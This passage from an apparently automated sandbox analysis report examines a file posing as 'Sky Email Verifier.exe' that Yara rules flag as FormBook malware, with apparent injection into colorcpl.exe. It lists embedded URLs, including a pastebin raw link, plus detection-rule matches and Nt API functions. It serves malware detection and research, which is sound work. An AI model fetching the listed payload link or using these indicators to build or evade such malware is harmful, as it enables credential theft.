          Source: Sky Email Verifier.exe, 00000000.00000002.223298088.00000000027B5000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
          Source: Sky Email Verifier.exe, 00000000.00000002.223298088.00000000027B5000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
          Source: Sky Email Verifier.exe | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
          Source: Sky Email Verifier.exe, 00000000.00000002.223298088.00000000027B5000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0
          Source: Sky Email Verifier.exe, 00000000.00000002.223298088.00000000027B5000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
          Source: Sky Email Verifier.exe | String found in binary or memory: http://ocsp.sectigo.com0
          Source: Sky Email Verifier.exe, 00000000.00000002.223298088.00000000027B5000.00000004.00000001.sdmp | String found in binary or memory: http://pastebin.com
          Source: Sky Email Verifier.exe, 00000000.00000002.223104574.0000000002731000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
          Source: Sky Email Verifier.exe | String found in binary or memory: https://ghostbin.com/
          Source: colorcpl.exe, 00000007.00000002.470888738.000000000235A000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2Gw
          Source: colorcpl.exe, 00000007.00000003.331932854.0000000005880000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.liv
          Source: Sky Email Verifier.exe, 00000000.00000002.223104574.0000000002731000.00000004.00000001.sdmp | String found in binary or memory: https://pastebin.com
          Source: Sky Email Verifier.exe | String found in binary or memory: https://pastebin.com/raw/6FS2vjq5
          Source: Sky Email Verifier.exe, 00000000.00000002.223348090.00000000027D0000.00000004.00000001.sdmp, Sky Email Verifier.exe, 00000000.00000002.223298088.00000000027B5000.00000004.00000001.sdmp | String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
          Source: Sky Email Verifier.exe | String found in binary or memory: https://sectigo.com/CPS0D
          Source: Sky Email Verifier.exe, 00000000.00000002.223298088.00000000027B5000.00000004.00000001.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
          Source: Sky Email Verifier.exe, 00000000.00000002.222263719.0000000000998000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000002.00000002.249408964.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.250036862.0000000001710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.470914868.0000000002390000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.250085386.0000000001740000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.223476201.0000000003739000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.472311143.0000000004290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.223552024.00000000037BB000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.472153635.0000000004260000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 2.2.Sky Email Verifier.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.Sky Email Verifier.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000002.00000002.249408964.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.249408964.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.250036862.0000000001710000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.250036862.0000000001710000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.470914868.0000000002390000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.470914868.0000000002390000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.250085386.0000000001740000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.250085386.0000000001740000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.223476201.0000000003739000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.223476201.0000000003739000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.472311143.0000000004290000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.472311143.0000000004290000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.223552024.00000000037BB000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.223552024.00000000037BB000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.472153635.0000000004260000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.472153635.0000000004260000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.2.Sky Email Verifier.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Sky Email Verifier.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.2.Sky Email Verifier.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Sky Email Verifier.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 0_2_0096C73C NtSetInformationThread,0_2_0096C73C
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 0_2_0096D100 NtSetInformationThread,0_2_0096D100
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_00417930 NtCreateFile,2_2_00417930
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_004179E0 NtReadFile,2_2_004179E0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_00417A60 NtClose,2_2_00417A60
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_00417B10 NtAllocateVirtualMemory,2_2_00417B10
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_0041792A NtCreateFile,2_2_0041792A
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_00417A5C NtClose,2_2_00417A5C
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_00417B0A NtAllocateVirtualMemory,2_2_00417B0A
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_00417B8A NtAllocateVirtualMemory,2_2_00417B8A
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_019799A0 NtCreateSection,LdrInitializeThunk,2_2_019799A0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01979910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01979910
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_019798F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_019798F0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01979840 NtDelayExecution,LdrInitializeThunk,2_2_01979840
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01979860 NtQuerySystemInformation,LdrInitializeThunk,2_2_01979860
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01979A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01979A00
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01979A20 NtResumeThread,LdrInitializeThunk,2_2_01979A20
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01979A50 NtCreateFile,LdrInitializeThunk,2_2_01979A50
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_019795D0 NtClose,LdrInitializeThunk,2_2_019795D0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01979540 NtReadFile,LdrInitializeThunk,2_2_01979540
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01979780 NtMapViewOfSection,LdrInitializeThunk,2_2_01979780
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_019797A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_019797A0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01979FE0 NtCreateMutant,LdrInitializeThunk,2_2_01979FE0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01979710 NtQueryInformationToken,LdrInitializeThunk,2_2_01979710
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_019796E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_019796E0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01979660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_01979660
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_019799D0 NtCreateProcessEx,2_2_019799D0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01979950 NtQueueApcThread,2_2_01979950
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_019798A0 NtWriteVirtualMemory,2_2_019798A0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01979820 NtEnumerateKey,2_2_01979820
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_0197B040 NtSuspendThread,2_2_0197B040
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_0197A3B0 NtGetContextThread,2_2_0197A3B0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01979B00 NtSetValueKey,2_2_01979B00
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01979A80 NtOpenDirectoryObject,2_2_01979A80
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01979A10 NtQuerySection,2_2_01979A10
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_019795F0 NtQueryInformationFile,2_2_019795F0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_0197AD30 NtSetContextThread,2_2_0197AD30
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01979520 NtWaitForSingleObject,2_2_01979520
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01979560 NtWriteFile,2_2_01979560
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_0197A710 NtOpenProcessToken,2_2_0197A710
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01979730 NtQueryVirtualMemory,2_2_01979730
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_0197A770 NtOpenThread,2_2_0197A770
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01979770 NtSetInformationFile,2_2_01979770
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01979760 NtOpenProcess,2_2_01979760
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_019796D0 NtCreateKey,2_2_019796D0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01979610 NtEnumerateValueKey,2_2_01979610
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01979650 NtQueryValueKey,2_2_01979650
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01979670 NtQueryInformationProcess,2_2_01979670
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044F9540 NtReadFile,LdrInitializeThunk,7_2_044F9540
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044F95D0 NtClose,LdrInitializeThunk,7_2_044F95D0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044F9650 NtQueryValueKey,LdrInitializeThunk,7_2_044F9650
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044F9660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_044F9660
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044F9610 NtEnumerateValueKey,LdrInitializeThunk,7_2_044F9610
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044F96D0 NtCreateKey,LdrInitializeThunk,7_2_044F96D0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044F96E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_044F96E0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044F9710 NtQueryInformationToken,LdrInitializeThunk,7_2_044F9710
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044F9FE0 NtCreateMutant,LdrInitializeThunk,7_2_044F9FE0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044F9780 NtMapViewOfSection,LdrInitializeThunk,7_2_044F9780
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044F9840 NtDelayExecution,LdrInitializeThunk,7_2_044F9840
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044F9860 NtQuerySystemInformation,LdrInitializeThunk,7_2_044F9860
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_044F9910
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044F99A0 NtCreateSection,LdrInitializeThunk,7_2_044F99A0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044F9A50 NtCreateFile,LdrInitializeThunk,7_2_044F9A50
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044F9B00 NtSetValueKey,LdrInitializeThunk,7_2_044F9B00
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044F9560 NtWriteFile,7_2_044F9560
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044F9520 NtWaitForSingleObject,7_2_044F9520
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044FAD30 NtSetContextThread,7_2_044FAD30
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044F95F0 NtQueryInformationFile,7_2_044F95F0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044F9670 NtQueryInformationProcess,7_2_044F9670
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9760 NtOpenProcess,7_2_044F9760
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044FA770 NtOpenThread,7_2_044FA770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9770 NtSetInformationFile,7_2_044F9770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044FA710 NtOpenProcessToken,7_2_044FA710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9730 NtQueryVirtualMemory,7_2_044F9730
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F97A0 NtUnmapViewOfSection,7_2_044F97A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044FB040 NtSuspendThread,7_2_044FB040
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9820 NtEnumerateKey,7_2_044F9820
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F98F0 NtReadVirtualMemory,7_2_044F98F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F98A0 NtWriteVirtualMemory,7_2_044F98A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9950 NtQueueApcThread,7_2_044F9950
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F99D0 NtCreateProcessEx,7_2_044F99D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9A00 NtProtectVirtualMemory,7_2_044F9A00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9A10 NtQuerySection,7_2_044F9A10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9A20 NtResumeThread,7_2_044F9A20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9A80 NtOpenDirectoryObject,7_2_044F9A80
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044FA3B0 NtGetContextThread,7_2_044FA3B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_023A7A60 NtClose,7_2_023A7A60
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_023A7B10 NtAllocateVirtualMemory,7_2_023A7B10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_023A7930 NtCreateFile,7_2_023A7930
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_023A79E0 NtReadFile,7_2_023A79E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_023A7A5C NtClose,7_2_023A7A5C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_023A7B0A NtAllocateVirtualMemory,7_2_023A7B0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_023A7B8A NtAllocateVirtualMemory,7_2_023A7B8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_023A792A NtCreateFile,7_2_023A792A
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 0_2_0096D2F8 0_2_0096D2F8
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 0_2_00963670 0_2_00963670
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 0_2_0096E8B0 0_2_0096E8B0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 0_2_0096AA50 0_2_0096AA50
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 0_2_00966D50 0_2_00966D50
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 0_2_00960EC0 0_2_00960EC0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 0_2_0096E8A0 0_2_0096E8A0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 0_2_0096AA41 0_2_0096AA41
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 0_2_00960E8F 0_2_00960E8F
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_00401030 2_2_00401030
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_00408A40 2_2_00408A40
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_00408A3B 2_2_00408A3B
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_0041C2C1 2_2_0041C2C1
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_0041ABE3 2_2_0041ABE3
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_0041BD05 2_2_0041BD05
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_0041C50F 2_2_0041C50F
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_00402D90 2_2_00402D90
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_0041C740 2_2_0041C740
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_0041B794 2_2_0041B794
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_00402FB0 2_2_00402FB0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_019599BF 2_2_019599BF
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_0193F900 2_2_0193F900
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01954120 2_2_01954120
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_0194B090 2_2_0194B090
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01A020A8 2_2_01A020A8
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_019620A0 2_2_019620A0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01A028EC 2_2_01A028EC
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01A0E824 2_2_01A0E824
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_019F1002 2_2_019F1002
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_0195A830 2_2_0195A830
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_0196138B 2_2_0196138B
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_0196EBB0 2_2_0196EBB0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_019F03DA 2_2_019F03DA
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_019FDBD2 2_2_019FDBD2
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_0196ABD8 2_2_0196ABD8
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_019E23E3 2_2_019E23E3
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01A02B28 2_2_01A02B28
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_0195A309 2_2_0195A309
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_019DCB4F 2_2_019DCB4F
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_0195AB40 2_2_0195AB40
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01A022AE 2_2_01A022AE
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_019F4AEF 2_2_019F4AEF
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_0195B236 2_2_0195B236
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_019EFA2B 2_2_019EFA2B
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01962581 2_2_01962581
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_019F2D82 2_2_019F2D82
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_0194D5E0 2_2_0194D5E0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01A025DD 2_2_01A025DD
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01A02D07 2_2_01A02D07
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01930D20 2_2_01930D20
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01A01D55 2_2_01A01D55
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_019F4496 2_2_019F4496
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_0194841F 2_2_0194841F
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_0195B477 2_2_0195B477
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_019FD466 2_2_019FD466
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01A01FF1 2_2_01A01FF1
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01A0DFCE 2_2_01A0DFCE
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01A02EF7 2_2_01A02EF7
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_019FD616 2_2_019FD616
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: 2_2_01956E30 2_2_01956E30
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_0457D466 7_2_0457D466
